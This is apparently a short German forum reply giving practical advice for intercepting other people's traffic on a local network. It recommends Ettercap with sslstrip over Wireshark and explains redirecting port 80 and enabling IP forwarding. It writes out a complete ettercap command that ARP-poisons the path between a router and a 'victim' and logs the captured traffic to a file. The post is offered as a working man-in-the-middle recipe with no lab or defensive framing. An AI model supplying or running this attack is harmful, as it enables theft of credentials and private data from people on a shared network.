Also ich finde Wireshark eh viel zu Monströs zu bunt und irgendwie blöd. Nimm lieber die Textversion (oder meinetwegen grafikversion) von Ettercap und sslstrip. Leite Port 80 auf einen beliebigen xy Port für sslstrip um. ip forwarding nicht vergessen! dann ssl auf port xy starten .
ettercap -T -i $interface -w log.pcap -L /sitzung -M arp /router/ /opfer/
Auslesen kannst du die .pcap nachher immernoch mit wireshark. Aber damit im Superusermodus rumzugurken ist, von der eigentlichen Natur der Sache betrachtet , reichlich behämmert.
|